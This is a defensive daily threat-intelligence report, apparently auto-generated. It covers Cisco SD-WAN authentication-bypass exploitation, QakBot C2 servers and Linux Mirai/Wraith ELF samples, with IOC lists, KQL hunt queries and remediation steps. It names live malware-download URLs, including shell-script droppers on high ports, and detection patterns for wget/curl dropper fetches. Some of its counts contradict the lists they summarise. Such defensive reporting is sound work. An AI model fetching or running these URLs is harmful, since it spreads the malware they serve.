โ† Back to Dashboard
May 16, 2026

Daily Threat Intelligence Report โ€” 2026-05-14

28
IOCs
12
TTPs
9
KQL Queries
Executive Summary

Today's threat landscape is dominated by three converging threats: active QakBot and Emotet C2 infrastructure confirmed by Feodotracker across US, UK, and Japanese hosting providers; active exploitation of CVE-2026-20182 (Cisco Catalyst SD-WAN authentication bypass) tracked by AlienVault OTX and CISA KEV with 33 confirmed IOCs attributed to threat actor UAT-8616; and a surge in Linux ELF malware distribution including Mirai botnet samples and Wraith-tagged payloads observed across MalwareBazaar and URLhaus malware download infrastructure. Immediate actions required: block all five Feodotracker C2 IPs at perimeter, apply Cisco SD-WAN patches per CISA Emergency Directive 26-03, and hunt for UPX-packed ELF executions on Linux endpoints. Additionally, CISA KEV lists four other critical vulnerabilities including Palo Alto PAN-OS RCE (CVE-2026-0300), Ivanti EPMM RCE (CVE-2026-6973), Microsoft Exchange XSS (CVE-2026-42897), and BerriAI LiteLLM SQLi (CVE-2026-42208) requiring immediate patching.

#1

Active Exploitation of Cisco Catalyst SD-WAN Authentication Bypass (CVE-2026-20182) by UAT-8616

CRITICAL UAT-8616

Threat actor UAT-8616 is actively exploiting CVE-2026-20182, a critical authentication bypass vulnerability in Cisco Catalyst SD-WAN Controller and Manager, enabling unauthenticated remote attackers to obtain full administrative privileges. This campaign is confirmed by AlienVault OTX with 33 associated IOCs and corroborated by CISA's Known Exploited Vulnerabilities catalogue with an active Emergency Directive (ED 26-03). Successful exploitation grants attackers complete control over SD-WAN fabric, enabling network traffic manipulation, lateral movement, persistent backdoor installation, and potential supply-chain-style pivoting into connected enterprise networks. CISA mandates immediate remediation per ED 26-03 and has published specific Hunt and Hardening Guidance for Cisco SD-WAN devices; organizations unable to patch immediately must assess exposure and consider isolation of affected controllers.

๐Ÿ”ด Indicators of Compromise
CVE CVE-2026-20182 Authentication bypass in Cisco Catalyst SD-WAN Controller & Manager โ€” actively exploited by UAT-8616, allows unauthenticated RCE with admin privileges
URL https://backyard-harvest-planner.garden/429e5532-8c10-4da4-9aee-c2eec2d23872/google.cl Active malware download URL โ€” URLhaus confirmed malware_download, likely used for payload staging post-exploitation
URL https://evergreentimberland.garden/aa85d475-72f2-4c64-9cab-57a7c8a4d3be/google.cl Active malware download URL โ€” URLhaus confirmed malware_download, disguised garden-themed domain used for C2 or payload delivery
HASH cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9 Mirai ELF malware sample โ€” UPX-packed, MalwareBazaar confirmed โ€” consistent with post-exploitation payload deployed on network devices
๐ŸŸฃ MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application MITRE โ†’
T1098 Account Manipulation MITRE โ†’
T1071.001 Web Protocols C2 MITRE โ†’
T1562.001 Impair Defenses: Disable or Modify Tools MITRE โ†’
๐ŸŸข Hunt Queries
SENTINEL Hunt for Suspicious Connections to Malware Download Infrastructure Associated with SD-WAN Exploitation

Detects outbound connections from network devices or servers to URLhaus-confirmed malware download URLs associated with post-exploitation payload staging. Focuses on the garden-themed HTTPS domains identified as active malware download infrastructure.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('backyard-harvest-planner.garden', 'evergreentimberland.garden')
    or DestinationHostName has_any ('backyard-harvest-planner.garden', 'evergreentimberland.garden')
| project TimeGenerated, SourceIP, DestinationIP, DestinationHostName, RequestURL, Activity, DeviceVendor
| order by TimeGenerated desc
MDE Detect UPX-Packed Mirai ELF Execution โ€” Post-Exploitation Payload

Hunts for execution of the Mirai ELF sample confirmed by MalwareBazaar (cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9) consistent with post-exploitation payloads dropped after Cisco SD-WAN compromise.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 == 'cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9'
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL Cisco SD-WAN Admin Authentication Anomaly Detection

Identifies suspicious administrative authentication events on Cisco SD-WAN infrastructure that may indicate exploitation of CVE-2026-20182. Flags admin logins from non-whitelisted management IPs.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DeviceVendor == 'Cisco'
| where Activity has_any ('admin', 'authentication', 'login', 'privilege')
| where Message has_any ('SD-WAN', 'vManage', 'vBond', 'vSmart')
| summarize AuthCount=count() by SourceIP, DestinationIP, Activity, bin(TimeGenerated, 1h)
| where AuthCount > 3
| order by AuthCount desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Apply Cisco patches per CISA Emergency Directive 26-03 โ€” prioritize SD-WAN Controller and Manager instances exposed to internet-facing interfaces
โ†’ IMMEDIATE: Follow CISA Hunt and Hardening Guidance for Cisco SD-WAN Devices to identify signs of prior compromise before patching
โ†’ IMMEDIATE: Block outbound connections to backyard-harvest-planner.garden and evergreentimberland.garden at proxy and DNS filtering layers
โ†’ IMMEDIATE: Audit all administrative accounts on SD-WAN Controllers for unauthorized additions or modifications in the past 30 days
โ†’ SHORT-TERM: Deploy Sentinel KQL query to identify anomalous admin authentication events across Cisco SD-WAN infrastructure
โ†’ SHORT-TERM: Implement out-of-band log shipping from all SD-WAN components to a SIEM to preserve tamper-evident audit trails
โ†’ SHORT-TERM: Scan all Linux endpoints for Mirai ELF sample SHA256 cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9 using EDR
โ†’ LONG-TERM: Enforce network segmentation isolating SD-WAN management plane from general corporate network access
โ†’ LONG-TERM: Integrate AlienVault OTX pulse IOCs (33 indicators) for UAT-8616 campaign into SIEM and firewall block lists
#2

QakBot Banking Trojan C2 Infrastructure Active Across Three Countries โ€” Imminent Financial Sector Risk

HIGH TA505

Feodotracker has confirmed three active QakBot command-and-control servers operational across US (50.16.16.211, 34.204.119.63), UK (178.62.3.223), and Japan (27.133.154.218) infrastructure, indicating a geographically distributed and resilient C2 architecture actively supporting live QakBot infections. QakBot (also known as QBot/Pinkslipbot) is a sophisticated banking trojan historically associated with TA505 operations, known for credential theft, lateral movement, and serving as a precursor loader for ransomware deployments including Black Basta and Conti. The multi-country hosting pattern is consistent with TA505's documented use of compromised legitimate infrastructure to evade geo-based blocking and maintain operational continuity even when individual nodes are taken down. Organizations with active infections may be at imminent risk of credential exfiltration and ransomware pre-positioning; immediate blocking and retroactive hunting across 90 days of network logs is strongly advised.

๐Ÿ”ด Indicators of Compromise
IP 50.16.16.211 QakBot C2 server โ€” US-hosted โ€” Feodotracker confirmed active
IP 34.204.119.63 QakBot C2 server โ€” US-hosted โ€” Feodotracker confirmed active
IP 178.62.3.223 QakBot C2 server โ€” UK-hosted โ€” Feodotracker confirmed active
IP 27.133.154.218 QakBot C2 server โ€” Japan-hosted โ€” Feodotracker confirmed active
URL https://wavellen.github.io/Microsoft-Clone-Home-Page Active Microsoft credential phishing page โ€” OpenPhish confirmed โ€” consistent with QakBot initial access via phishing
HASH b5962bbac90bfc8f48ca89d5f0137e91de6030c2fcd4bd34491d6e84b77a3924 BAT file malware sample โ€” MalwareBazaar confirmed โ€” consistent with QakBot delivery via malicious batch script droppers
๐ŸŸฃ MITRE ATT&CK TTPs
T1566.001 Spearphishing Attachment MITRE โ†’
T1071.001 Web Protocols C2 MITRE โ†’
T1555.003 Credentials from Web Browsers MITRE โ†’
T1021.002 SMB/Windows Admin Shares MITRE โ†’
๐ŸŸข Hunt Queries
MDE Hunt for Active Connections to QakBot C2 Infrastructure

Detects any outbound connections to all four confirmed active QakBot C2 servers identified by Feodotracker. Any match indicates active QakBot infection requiring immediate incident response.

DeviceNetworkEvents
| where TimeGenerated > ago(90d)
| where RemoteIP in ('50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountName
| order by TimeGenerated desc
MDE Detect BAT File Dropper Execution โ€” QakBot Stager

Hunts for execution of the MalwareBazaar-confirmed BAT file sample associated with QakBot delivery (b5962bbac90bfc8f48ca89d5f0137e91de6030c2fcd4bd34491d6e84b77a3924) and suspicious cmd.exe spawning patterns consistent with batch script dropper activity.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 == 'b5962bbac90bfc8f48ca89d5f0137e91de6030c2fcd4bd34491d6e84b77a3924'
    or (FileName endswith '.bat' and InitiatingProcessFileName in ('outlook.exe', 'winword.exe', 'excel.exe', 'powerpnt.exe', 'mshta.exe', 'wscript.exe'))
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountName
| order by TimeGenerated desc
MDI Detect Lateral Movement via SMB After QakBot Credential Theft

Identifies suspicious NTLM authentication patterns consistent with QakBot lateral movement using harvested credentials โ€” specifically high-volume authentication from a single source to multiple destinations.

IdentityLogonEvents
| where TimeGenerated > ago(24h)
| where ActionType == 'LogonSuccess'
| where Protocol == 'Ntlm'
| where LogonType in ('Network', 'NetworkCleartext')
| summarize LogonCount=count(), DistinctDestinations=dcount(DeviceName) by AccountDisplayName, IPAddress, bin(TimeGenerated, 1h)
| where LogonCount > 5 or DistinctDestinations > 3
| order by DistinctDestinations desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Block all four QakBot C2 IPs (50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) at perimeter firewall, web proxy, and DNS sinkholes
โ†’ IMMEDIATE: Run the MDE C2 connection hunt query across a 90-day lookback โ€” any hit is a confirmed active infection requiring IR escalation
โ†’ IMMEDIATE: Block the Microsoft-clone phishing URL https://wavellen.github.io/Microsoft-Clone-Home-Page at web proxy and email security gateway
โ†’ IMMEDIATE: Submit BAT dropper hash b5962bbac90bfc8f48ca89d5f0137e91de6030c2fcd4bd34491d6e84b77a3924 to EDR platform for immediate blocking across all endpoints
โ†’ SHORT-TERM: Execute MDI lateral movement detection query and investigate all accounts with NTLM logon counts exceeding 5 in a 1-hour window
โ†’ SHORT-TERM: Force password resets for any accounts identified on endpoints with suspected QakBot infections
โ†’ SHORT-TERM: Enable MFA on all user accounts, prioritizing privileged and service accounts, to limit impact of harvested credentials
โ†’ LONG-TERM: Implement SMB firewall rules blocking workstation-to-workstation SMB to limit QakBot lateral movement capability
โ†’ LONG-TERM: Update Feodotracker feed integration to automatically block newly listed QakBot C2 IPs within 1 hour of publication
#3

Coordinated Linux ELF Botnet Recruitment Campaign โ€” Mirai, Wraith, and UPX-Packed Malware Surge via Malware Download Infrastructure

MEDIUM Unknown Threat Actor

MalwareBazaar has identified a cluster of nine Linux ELF binaries submitted within the last 24 hours โ€” the majority UPX-packed โ€” alongside two samples tagged with the 'wraith' stealer designation, and one confirmed Mirai botnet sample (cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9). These are being distributed via URLhaus-confirmed malware download infrastructure using non-standard high-numbered TCP ports (33129, 48114, 48707, 54809, 32782, 35600) across IP addresses geolocated to China, Pakistan, and Australia, consistent with compromised IoT and home router infrastructure used as distribution nodes. The Wraith-tagged ELF samples (5e9747bbc50448329ec19615861b53c11398ccd171c4c7e5c227e0c1d73fb219, e98b8422076992dd1ee7a6ee4a7ca71b08004d8a80104186ad01490d5eba7e45, aef8c86b9a3d3d4392641868a17670c82ae136fdc9767277fbf81fdbeb566ac8) indicate a potential Go-based stealer component alongside the botnet recruitment activity, suggesting a dual-purpose campaign targeting both Linux server compromise and credential theft. GitHub/stamparm maltrail updates to ClearFake and OSX Atomic tracking files indicate parallel expansion of this threat across multiple platforms.

๐Ÿ”ด Indicators of Compromise
HASH cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9 Confirmed Mirai botnet ELF binary โ€” UPX-packed โ€” MalwareBazaar confirmed
HASH 5e9747bbc50448329ec19615861b53c11398ccd171c4c7e5c227e0c1d73fb219 Wraith stealer ELF binary โ€” MalwareBazaar confirmed โ€” potential credential theft component
HASH e98b8422076992dd1ee7a6ee4a7ca71b08004d8a80104186ad01490d5eba7e45 Wraith stealer ELF binary โ€” UPX-packed โ€” MalwareBazaar confirmed
HASH aef8c86b9a3d3d4392641868a17670c82ae136fdc9767277fbf81fdbeb566ac8 Wraith stealer ELF binary โ€” UPX-packed โ€” MalwareBazaar confirmed
HASH 8fef5d340cdaaf4c28d1c3a3a962fc1b5c9cbdbc42a2147c694ebf0ef6b1f860 UPX-packed ELF binary โ€” MalwareBazaar confirmed โ€” unclassified family
HASH 4465fe927fb161af41e689f68ff6019db07859906ed639515c0bc351046d7033 UPX-packed ELF binary โ€” MalwareBazaar confirmed โ€” unclassified family
HASH cfbc1c3699c99c4cb6f11d1aead29dd7b6eba440a88a4142505eede3e5430fff UPX-packed ELF binary โ€” MalwareBazaar confirmed โ€” unclassified family
HASH 060442f18212e1148afc9c7514d90384973956c0c246d5562c7f4da1473a7bd9 UPX-packed ELF binary โ€” MalwareBazaar confirmed โ€” unclassified family
HASH 4dfa9563f4889e22f0d279b83b33205394960560fa010048cf0424bbfbb26adb UPX-packed ELF binary โ€” MalwareBazaar confirmed โ€” unclassified family
URL http://110.36.30.112:33129/i Active malware download URL serving ELF payloads โ€” URLhaus confirmed malware_download โ€” non-standard port 33129
URL http://123.5.124.220:48114/bin.sh Active malware download URL serving shell script โ€” URLhaus confirmed malware_download โ€” non-standard port 48114
URL http://221.215.249.36:48707/i Active malware download URL serving ELF payload โ€” URLhaus confirmed malware_download โ€” non-standard port 48707
URL http://115.57.194.83:54809/i Active malware download URL serving ELF payload โ€” URLhaus confirmed malware_download โ€” non-standard port 54809
URL http://115.57.194.83:54809/bin.sh Active malware download URL serving shell script โ€” URLhaus confirmed malware_download โ€” same host dual delivery
URL http://182.176.116.4:32782/bin.sh Active malware download URL serving shell script โ€” URLhaus confirmed malware_download โ€” non-standard port 32782
URL http://222.140.189.209:35600/i Active malware download URL serving ELF payload โ€” URLhaus confirmed malware_download โ€” non-standard port 35600
URL http://222.140.189.209:35600/bin.sh Active malware download URL serving shell script โ€” URLhaus confirmed malware_download โ€” same host dual delivery
IP 162.243.103.246 Emotet C2 server โ€” US-hosted โ€” Feodotracker confirmed active โ€” contextually relevant to broader botnet ecosystem
๐ŸŸฃ MITRE ATT&CK TTPs
T1105 Ingress Tool Transfer MITRE โ†’
T1027.002 Obfuscated Files or Information: Software Packing MITRE โ†’
T1498.001 Direct Network Flood MITRE โ†’
T1552.004 Private Keys MITRE โ†’
๐ŸŸข Hunt Queries
MDE Detect Execution of Known Malicious ELF Hashes โ€” Mirai and Wraith Cluster

Hunts for execution or file creation events matching all MalwareBazaar-confirmed ELF malware hashes from today's reporting period, including the confirmed Mirai sample and three Wraith-tagged stealer binaries.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 in (
    'cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9',
    '5e9747bbc50448329ec19615861b53c11398ccd171c4c7e5c227e0c1d73fb219',
    'e98b8422076992dd1ee7a6ee4a7ca71b08004d8a80104186ad01490d5eba7e45',
    'aef8c86b9a3d3d4392641868a17670c82ae136fdc9767277fbf81fdbeb566ac8',
    '8fef5d340cdaaf4c28d1c3a3a962fc1b5c9cbdbc42a2147c694ebf0ef6b1f860',
    '4465fe927fb161af41e689f68ff6019db07859906ed639515c0bc351046d7033',
    'cfbc1c3699c99c4cb6f11d1aead29dd7b6eba440a88a4142505eede3e5430fff',
    '060442f18212e1148afc9c7514d90384973956c0c246d5562c7f4da1473a7bd9',
    '4dfa9563f4889e22f0d279b83b33205394960560fa010048cf0424bbfbb26adb'
)
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDE Detect ELF Malware Download via Non-Standard High Ports โ€” URLhaus Infrastructure

Identifies outbound HTTP connections to URLhaus-confirmed malware download IPs on high-numbered non-standard ports consistent with Mirai/botnet dropper delivery infrastructure.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('110.36.30.112', '123.5.124.220', '221.215.249.36', '115.57.194.83', '182.176.116.4', '222.140.189.209')
    or (RemotePort in (33129, 48114, 48707, 54809, 32782, 35600) and ActionType == 'ConnectionSuccess')
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, LocalIP, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL Detect Shell Script and ELF Download Patterns on Linux Infrastructure

Identifies wget or curl commands fetching from high-numbered non-standard ports with short filenames consistent with Mirai dropper patterns (/i, /bin.sh) observed across URLhaus confirmed infrastructure.

Syslog
| where TimeGenerated > ago(24h)
| where SyslogMessage has_any ('wget', 'curl')
| where SyslogMessage has_any ('33129', '48114', '48707', '54809', '32782', '35600')
    or SyslogMessage has_any ('110.36.30.112', '123.5.124.220', '221.215.249.36', '115.57.194.83', '182.176.116.4', '222.140.189.209')
    or SyslogMessage matches regex @'/(i|bin\.sh)\b'
| project TimeGenerated, Computer, HostName, SyslogMessage, ProcessName
| order by TimeGenerated desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Block all eight URLhaus malware download IPs (110.36.30.112, 123.5.124.220, 221.215.249.36, 115.57.194.83, 182.176.116.4, 222.140.189.209) at perimeter firewall and Linux host-based firewalls
โ†’ IMMEDIATE: Submit all nine ELF hashes to EDR platform and antivirus for immediate detection and blocking across Linux endpoints
โ†’ IMMEDIATE: Implement egress firewall rules blocking outbound HTTP/HTTPS on non-standard ports above 30000 from server and IoT network segments
โ†’ SHORT-TERM: Execute MDE hash hunt query across all Linux endpoints and investigate any matches as active compromises requiring immediate IR
โ†’ SHORT-TERM: Audit all Linux servers and IoT devices for default credentials โ€” rotate SSH keys and disable default accounts on all internet-facing Linux infrastructure
โ†’ SHORT-TERM: Deploy YARA rules detecting UPX-packed ELF binaries executing from /tmp, /var/tmp, or world-writable directories
โ†’ SHORT-TERM: Review GitHub/stamparm/maltrail ClearFake and OSX Atomic signature updates and deploy updated detection rules to network traffic analysis platforms
โ†’ LONG-TERM: Implement network segmentation isolating IoT devices from server infrastructure to limit lateral movement of Mirai-family botnets
โ†’ LONG-TERM: Deploy file integrity monitoring (FIM) on all Linux servers monitoring /tmp, /var/tmp, and system binary directories for unauthorized ELF execution